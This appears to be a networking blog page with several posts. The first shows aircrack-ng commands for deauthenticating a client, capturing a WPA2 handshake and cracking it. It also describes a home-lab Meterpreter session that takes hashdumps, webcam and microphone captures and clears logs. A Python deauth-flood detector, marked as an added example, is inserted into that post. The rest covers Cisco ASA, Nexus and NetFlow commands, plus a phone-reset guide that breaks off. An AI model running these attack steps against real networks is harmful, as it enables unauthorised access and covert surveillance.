Security insight: Cracking WPA2 and fun with Meterpreter

So my wife wasn’t well for most of the weekend and the kids were busy doing their stuff, so I got some time to play around 🙂 on my home lab. So here’s the thing:

It took me less than 5 minutes to obtain a WPA2 handshake and less than 5 seconds to brute-force the *.cap file that contained the password post-handshake; obviously it’s only as good as your word list.
Key commands are:

airmon-ng start [interface]
airodump-ng [monitor interface]
airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]
aireplay-ng -0 2 -a [router bssid] -c [client bssid] [monitor interface]
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap
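The aireplay-ng step above works by flooding the client with deauthentication frames so it reconnects and the handshake can be captured; the defender's counterpart is to spot that burst. This is an added example, not code from the original post: a small Python parser for raw 802.11 MAC headers plus a sliding-window counter of deauth frames per transmitter, the way a wireless IDS alerts on a deauth flood. The MAC addresses, timestamps, window and threshold are all constructed assumptions.

```python
import struct
from collections import defaultdict

# 802.11 frame control, first octet: bits 2-3 = type, bits 4-7 = subtype.
DEAUTH = (0, 0x0C)  # management frame, subtype 12 = deauthentication

def parse_header(frame: bytes) -> dict:
    """Parse the 24-byte fixed MAC header of an 802.11 frame (no radiotap, no FCS)."""
    fc0, _fc1, _duration = struct.unpack_from("<BBH", frame, 0)
    hdr = {
        "type": (fc0 >> 2) & 0x3,
        "subtype": (fc0 >> 4) & 0xF,
        "addr1": frame[4:10].hex(":"),   # receiver
        "addr2": frame[10:16].hex(":"),  # transmitter
        "addr3": frame[16:22].hex(":"),  # BSSID for management frames
    }
    if (hdr["type"], hdr["subtype"]) == DEAUTH:
        # The fixed body of a deauth frame is a 2-byte little-endian reason code.
        hdr["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return hdr

def detect_deauth_flood(frames, window_s=1.0, threshold=5):
    """Return {transmitter: peak count} for every transmitter that sends more than
    `threshold` deauth frames inside any `window_s`-second sliding window.
    `frames` is an iterable of (timestamp_seconds, raw_frame_bytes)."""
    recent = defaultdict(list)
    alerts = {}
    for ts, raw in frames:
        hdr = parse_header(raw)
        if (hdr["type"], hdr["subtype"]) != DEAUTH:
            continue
        times = recent[hdr["addr2"]]
        times.append(ts)
        while times and ts - times[0] > window_s:  # slide the window forward
            times.pop(0)
        if len(times) > threshold:
            alerts[hdr["addr2"]] = max(alerts.get(hdr["addr2"], 0), len(times))
    return alerts

# Constructed sample traffic (assumed MAC addresses, not captured data).
AP = bytes.fromhex("001122334455")
STA = bytes.fromhex("66778899aabb")

def sample_frame(fc0, addr1, addr2, addr3, body=b""):
    """Build one constructed frame for the demo: header with fc0, zero seq-ctl, then body."""
    return bytes([fc0, 0x00, 0x3A, 0x01]) + addr1 + addr2 + addr3 + b"\x00\x00" + body

SAMPLE = [(0.0, sample_frame(0x80, b"\xff" * 6, AP, AP))]                                 # beacon
SAMPLE += [(0.1 * i, sample_frame(0xC0, STA, AP, AP, b"\x07\x00")) for i in range(1, 9)]  # 8 deauths, reason 7
SAMPLE.append((1.0, sample_frame(0x08, AP, STA, AP, b"\x00" * 8)))                        # ordinary data frame
```

Running detect_deauth_flood(SAMPLE) flags the AP address with a peak of 8 deauth frames in the window; on a real monitor-mode capture the same logic runs over the frames a sniffer hands you after stripping the radiotap header.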

Further to that, and in about as much time as it took me to read up on Meterpreter (with recognition to Offensive Security), I was able to access a couple of Windows PCs on my test network. Not only was I able to access the target machines, I obtained a hashdump, took a screenshot, took remote control, opened a shell/cmd, downloaded a file and, probably the most impressive and most worrying, was able to run the remote webcam, taking a snap and a continuous stream, along with audio recording from the microphone on those target machines. :/ Oh… and I cleared the logs as I left the scene, all within a couple of hours.

So keep those systems secure and up to date peeps!

Reset Cisco IP Phone(7962) to the Factory Default

Complete these steps:

  1. Unplug the power cable from the phone, and then plug in the cable again.

The phone begins its power up cycle.

  2. Immediately press and hold # and, while the Headset, Mute, and Speaker buttons begin to flash in sequence, release #.

The line buttons (the buttons to the right of the display) flash in sequence to indicate that the phone is waiting for you to enter the key sequence for the reset.

  3. Press 123456789*0# within 60 seconds after the Headset, Mute, and Speaker buttons begin to flash.

If you do not complete this key sequence or do not press any keys, after 60 seconds the Headset, Mute, and Speaker buttons no longer flash, and the phone continues with its normal start-up process. The phone does not reset.

If you enter an invalid key sequence, the buttons no longer flash, and the phone continues with its normal startup process. The phone does not reset.

If you enter this key sequence correctly, the phone displays this prompt:


Troubleshooting Cisco ASA 5500 Firewalls

How to view interfaces and descriptions?
# show nameif

How to remove the entire access list?
# clear config access-list <ACL-Name>
– There are many things you can delete with the clear config command, so be careful how you use it.

How to view the interface name, IP address and state of the interface, similar to show ip int brief on a router?
# show interface ip brief
– The IP address and interface columns are reversed compared to a Cisco router

How to find out what unit is the active and standby units in a HA pair?
# show failover
– This will tell you which unit is active and which is standby, and whether the standby unit is ready to become active. It will also tell you whether the interfaces are monitored and whether any of them are down.

How to view interface statistics and port status
# show interface gigabit <slot/port>
– This is very similar to “show interface” on a router or a switch

How to view line numbers and the hit counters on an access list?
# show access-list -> will show all access lists
# show access-list <ACL-NAME>

How to view information on Cooling fans, Power supplies, Temperature and Voltage
# show environment
***This is going to be different on different models

How to find the IP address a known IP address is NAT’d to?
# show xlate -> Shows all NAT translations
# show xlate | include <known IP address> -> Shows the NAT translation for a specific IP address
– This is very useful on version 8.3 and above because the public and private IPs are not together in the configuration: part of it is up in the object groups, the rest is down in the NAT section.

How to view each connection going through the ASA?
# show conn

How to view the files on the flash card?
# show flash

How to view the IOS file the system will use on the next bootup?
# show bootvar

How to view CPU utilization and process information? ***command may vary by model and software release
# show cpu -> Shows 5 Second, 1 minute, and 5 minute average
# show processes [cpu-hog|cpu-usage|internals|memory] ->

Packet tracer is a great tool to see if a data flow is allowed through the firewall. This only works on Routed firewalls, it does not work in transparent mode. Cisco should get a pat on the back for this one!!

# packet-tracer input <incoming-interface> <Protocol-icmp|rawip|tcp|udp> <source-IP> <Source port> <Destination IP> <Destination port>

Example: # packet-tracer input inside tcp <source IP> 1024 <destination IP> 80
**Source port does not matter, I like to use 1024
Follow the output down the screen and it will tell you where it fails, or it will tell you it is allowed. Usually when it is dropped by ACL, it does not tell you what ACL is blocking it.

The ASA has a built-in packet capture feature. You can easily get a packet capture of any traffic flow going through the ASA.

1. Create your ACL with the specifics of what you are looking for

access-list 100 permit tcp host <source ip> host <destination ip> eq <port>
access-list 100 permit tcp host <destination ip> host <source ip> eq <port>

2. Create your captures and apply them to the inbound interface on the ASA

capture <capture name> access-list <acl name/number> buffer 700000 interface <interface traffic is entering> packet-length <packet length, e.g. 1518>

3. Have user perform a test
4. Copy the capture to your PC

Use a web browser and go to https://<ASA’s IP>/capture/<capture name>/pcap

It will prompt you to log in, then to download the file.

You can look at the output on the ASA with the “show capture <capture-name>” command.

*** I recommend creating your ACL for traffic in both directions. If you don’t, you will only see traffic in one direction.

Creating a SPAN session on a Nexus 9K

Create SPAN session
9kswitch# conf t
9kswitch(config)# monitor session 1

Configure destination port (destination cannot be a FEX port or a Port-channel!)
9kswitch# conf t
9kswitch(config)# interface eth 1/15
9kswitch(config-if)# switchport monitor
9kswitch(config-if)# exit
9kswitch(config)# monitor session 1
9kswitch(config-monitor)# destination interface eth 1/15

Configure source port (or VLAN)
9kswitch(config-monitor)# source interface eth 1/10
9kswitch(config-monitor)# source interface eth 1/11
9kswitch(config-monitor)# source vlan x

Activate a SPAN session
9kswitch(config)# no monitor session 1 shut

Display SPAN session
9kswitch# show monitor
9kswitch# show monitor session 1

conf t
monitor session 1
int eth 1/15
switchport monitor
monitor session 1
destination int eth 1/15
source int eth 1/10
source int eth 1/11
no monitor session 1 shut

Cisco Nexus 9000: Configuring SPAN


Here’s some useful ‘built-in’ Wireshark capability for troubleshooting on the supervisor. The feature only works with process-switched traffic.

nexus# ethanalyzer local interface inband capture-filter “udp port 161”

nexus# ethanalyzer local interface inband capture-filter “udp port 161” detail

nexus# ethanalyzer local interface inband capture-filter “udp port 161” write bootflash:snmp.pcap

An ACL log is necessary to capture data-plane traffic. Steps for this can be found here: Ethanalyzer Link



Outlook 2016 and Win 10 – Unable to send SMTP

I ran into this issue where SMTP would not send from within Outlook 2016 running on Win 10; I tried every known configuration of SMTP, both encrypted and unencrypted, with the same outcome.

I used the System File Checker by right clicking on the Start button and selecting Command Prompt (Admin). (You’ll need to click Yes to allow it to make changes to the computer.)


When the Command Prompt appears, type (or paste) sfc /scannow then hit Enter.


Restart the PC once the verification process has finished.

debug ICMP-Echo

“debug ip packet detail” will thrash the router if it is in production.

Probably best to create an extended access-list for the source/destination you are pinging.


access-list 101 permit icmp host <source IP> host <destination IP>

debug ip packet 101 detail

This shows detailed ICMP debugging between the 2 hosts specified in the ACL.

Handy NetFlow Commands

show ip flow interface

Displays the NetFlow configuration for an interface.

show ip cache flow

Verifies that NetFlow is operational and displays a summary of NetFlow statistics.

show ip cache verbose flow

Verifies that NetFlow is operational and displays a detailed summary of NetFlow statistics.

show ip flow export

Displays statistics for the NetFlow data export, including statistics for the main cache and for all other enabled caches.

show ip flow export template

Displays statistics for the NetFlow data export (such as the template time-out rate and the refresh rate) for template-specific configurations.

NetFlow Configuration Guide